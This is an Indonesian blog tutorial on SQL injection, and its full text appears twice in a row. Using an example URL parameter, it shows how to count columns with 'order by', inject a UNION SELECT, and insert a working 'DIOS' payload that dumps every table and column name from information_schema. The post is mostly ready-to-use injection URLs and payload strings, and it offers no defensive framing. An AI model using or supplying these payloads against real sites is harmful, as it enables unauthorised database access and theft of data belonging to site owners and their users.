SQL injection DIOS
SQL injection DIOS
assalamualaikum wr.wb
selamat beraktifitas kawan , ini pertama kali saya nge blog jadi di maklumi yah ^_^
Kali ini saia ingin share , SQL injection DIOS
Oke langsung saja
Contoh target: localhost/command.php?id=100
Selanjutnya kalian mencari jumlah column
Dengan , " order by "
contoh:
localhost/command.php?id=100+order+by+1--+ , lanjut terus sampai menemukan error
Contoh:
localhost/command.php?id=100+order+by+1--+ [ Normal ]
localhost/command.php?id=100+order+by+2--+ [ Normal ]
localhost/command.php?id=100+order+by+3--+ [ Normal ]
localhost/command.php?id=100+order+by+4--+ [ Error ]
Error nya terdapat di nomor 4 , berarti jumlah column Ada 3 , knapa bisa 3 Karena error nya di 4
Selanjutnya Kita mulai dengan " union+select+ "
Contoh:
localhost/command.php?id=100+union+select+1,2,3--+
Nanti Akan muncul angka cantik nya :v
Misalkan angka nya 1 Dan 2
Selanjutnya Kita masukkan DIOS
" (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x) "
langsung aja kalian isi dios nya
localhost/command.php?id=100+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)--+
Disini saia masukan Dios di angka 3 , nanti Akan Keluar isi db nya ._. ,
sampai sini dulu , Dan sampai jumpa ~
assalamualaikum wr.wb
selamat beraktifitas kawan , ini pertama kali saya nge blog jadi di maklumi yah ^_^
Kali ini saia ingin share , SQL injection DIOS
Oke langsung saja
Contoh target: localhost/command.php?id=100
Selanjutnya kalian mencari jumlah column
Dengan , " order by "
contoh:
localhost/command.php?id=100+order+by+1--+ , lanjut terus sampai menemukan error
Contoh:
localhost/command.php?id=100+order+by+1--+ [ Normal ]
localhost/command.php?id=100+order+by+2--+ [ Normal ]
localhost/command.php?id=100+order+by+3--+ [ Normal ]
localhost/command.php?id=100+order+by+4--+ [ Error ]
Error nya terdapat di nomor 4 , berarti jumlah column Ada 3 , knapa bisa 3 Karena error nya di 4
Selanjutnya Kita mulai dengan " union+select+ "
Contoh:
localhost/command.php?id=100+union+select+1,2,3--+
Nanti Akan muncul angka cantik nya :v
Misalkan angka nya 1 Dan 2
Selanjutnya Kita masukkan DIOS
" (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x) "
langsung aja kalian isi dios nya
localhost/command.php?id=100+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)--+
Disini saia masukan Dios di angka 3 , nanti Akan Keluar isi db nya ._. ,
sampai sini dulu , Dan sampai jumpa ~
Komentar
Posting Komentar